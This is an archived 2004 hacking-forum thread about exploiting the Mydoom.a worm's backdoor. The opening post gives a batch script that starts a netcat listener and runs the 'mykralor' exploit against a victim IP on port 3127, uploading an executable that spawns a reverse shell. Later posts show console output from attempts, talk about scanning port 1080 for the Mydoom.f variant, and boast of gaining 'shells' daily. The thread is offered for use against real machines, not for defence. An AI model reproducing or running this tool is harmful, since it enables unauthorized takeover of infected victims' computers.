hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Mydoom.a Exploit :)
GovernmentSecurity.org > The Archives > Exploit Articles
Pages: 1, 2, 3, 4, 5
usch
Feb 23 2004, 08:42 AM
CODE

echo off
cls
echo ----------------------------------------------------------
echo ¦                    Mydoom.a Autohax0r                  ¦
echo ¦                      code by tjarx                     ¦
echo ¦                 for governmentsecurity.org             ¦
echo ¦                   special thx to Demoman               ¦
echo ¦________________________________________________________¦
echo ----------------------------------------------------------
echo.
echo.
set /p ownip=                Your IP:
set /p vicip=                Enter the Machine's IP:
set /p exec=                 Enter your shell executable:
start nc.exe -v -l -s %ownip% -p 4445
mykralor.exe %vicip% 3127 %exec%



Notes:the bat has to be put into the same directory as nc.exe and mykralor are.
your created shell-executable has to spawn a shell on port 4445 cause that`s the port nc is listening on

have fun with that tool
hope it works wink.gif
Leonnetje
Feb 23 2004, 08:46 AM
Tnx for the autohaxor Usch.. biggrin.gif

Don't think i'll use it anymore, cause seems like every machine that WAS infected has already been patched... All vuln's are gone.
dragonfly
Feb 23 2004, 09:12 AM
yes indeed all the mydoom.a has replaced with mydoom.c so bye bye Mydoom sad.gif
Sedolf
Feb 24 2004, 11:40 PM
Need to post it here because I cant make new threads..
As you know the mydoom.f variant of the worm is out now and spreading very fast!
It opens TCP port 1080 for hacker attacks, seems to use same system as mydoom.a/b
So my questions now are: Any1 had luck scanning port 1080 and trying to exploit with mykralor?
Do you think that it could work or does every mydoom variant use another method of being exploited?
Do mydoomjuice (and how they are all called) kill this worm?
If you get hands on the source code - it should be possible to modify the kralor sploit?
thats's it
unsure.gif
tazthedev
Feb 25 2004, 12:08 AM
Damn...... i hate that damn exploit .....


Cannot get any reverse shell sad.gif sad.gif sad.gif

-----------------------------------
i try this....... mykralor.exe xxx.xxx.91.90 3127 shell.exe

[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.

C:\hacks\exploit\mydoom\MyDoomGui211>

---------------------------------------------------------

C:\hacks\exploit\mydoom\MyDoomGui211>nc -v -l -s xxx.xxx.198.27 -p 3128
listening on [xxx.xxx.198.27] 3128 ...
-----------------------------------------------------------

There's nothing ..... got no damn shell sad.gif


PLZ...... HELP !!!!! I GOT NOTHING, WHY ?
Nexcess
Feb 25 2004, 12:24 AM
QUOTE (tazthedev @ Feb 25 2004, 12:08 AM)
Damn...... i hate that damn exploit .....


Cannot get any reverse shell sad.gif sad.gif sad.gif

-----------------------------------
i try this....... mykralor.exe xxx.xxx.91.90 3127 shell.exe

[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.

C:\hacks\exploit\mydoom\MyDoomGui211>

---------------------------------------------------------

C:\hacks\exploit\mydoom\MyDoomGui211>nc -v -l -s xxx.xxx.198.27 -p 3128
listening on [xxx.xxx.198.27] 3128 ...
-----------------------------------------------------------

There's nothing ..... got no damn shell sad.gif


PLZ...... HELP !!!!! I GOT NOTHING, WHY ?

because the worm terminated on the 12th its a waste of time now.
bdark
Feb 25 2004, 12:46 AM
now it's very hard to get a shell even if you scan dozens of ranges daily :/ check others exploits
Black Flag
Feb 25 2004, 03:26 AM
QUOTE (Sedolf @ Feb 24 2004, 11:40 PM)
Need to post it here because I cant make new threads..
As you know the mydoom.f variant of the worm is out now and spreading very fast!
It opens TCP port 1080 for hacker attacks, seems to use same system as mydoom.a/b
So my questions now are: Any1 had luck scanning port 1080 and trying to exploit with mykralor?
Do you think that it could work or does every mydoom variant use another method of being exploited?
Do mydoomjuice (and how they are all called) kill this worm?
If you get hands on the source code - it should be possible to modify the kralor sploit?
thats's it
unsure.gif

problem is the port 1080 is also used by socks proxy servers...
mortello
Feb 25 2004, 03:41 AM
False

It's still possible to get shells (got a friend which still gets 10-12 shells a day using this exploit)

However, its not as easy as it once was
Black Flag
Feb 25 2004, 03:47 AM
hmmm really ?

i thought the new mydoom variant killed the exploit?
damn lol guess i was misinformed. D:

*edits other post*
Samkbc
Feb 25 2004, 12:12 PM
I havent been able to get one shell out of this exploit, I would say its pretty much dead. My question is what would you guys suggest as the best exploit there is to scan for now, gotta keep my systems safe! smile.gif
macman
Feb 26 2004, 09:05 AM
I was under the impression that the DDoS attack stopped on the 12th, but the backdoor stays until removed.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.